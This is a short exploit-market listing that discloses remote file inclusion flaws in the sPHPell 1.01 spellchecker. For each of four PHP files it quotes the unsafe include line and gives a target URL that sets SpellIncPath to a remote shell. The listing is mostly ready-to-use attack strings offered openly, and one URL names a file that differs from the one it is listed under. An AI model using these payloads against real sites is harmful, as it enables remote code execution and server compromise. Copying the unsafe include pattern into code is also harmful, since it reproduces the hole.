[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

sPHPell 1.01 Multiple Remote File Inclusion Vulnerabilities

Author
xoron
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-1993
Category
web applications
Date add
29-06-2007
Platform
unsorted
===========================================================
sPHPell 1.01 Multiple Remote File Inclusion Vulnerabilities
===========================================================




sphpell - 1.01 Remote File Include

---------------------------------------------------------------------------------
ERROR [1];spellcheckpageinc.php?

              include($SpellIncPath."spellcheckvars.php");

BUG:       www.target.com/checkpageinc.php?SpellIncPath=5h3LL
---------------------------------------------------------------------------------
ERROR [2];spellchecktext.php?

                   include($SpellIncPath."spellcheckvars.php");

BUG:       www.target.com/spellchecktext.php? SpellIncPath=5h3LL
---------------------------------------------------------------------------------
ERROR [3];spellcheckwindow.php?

                        include($SpellIncPath."spellcheckvars.php");

BUG:       www.target.com/spellcheckwindow.php?SpellIncPath=5h3LL
---------------------------------------------------------------------------------
ERROR [4];spellcheckwindowframeset.php?

                     include($SpellIncPath."spellcheckvars.php");

BUG:       www.target.com/spellcheckwindowframeset.php?SpellIncPath=5h3LL

---------------------------------------------------------------------------------
d0rk: :(



#  0day.today [2024-12-25]  #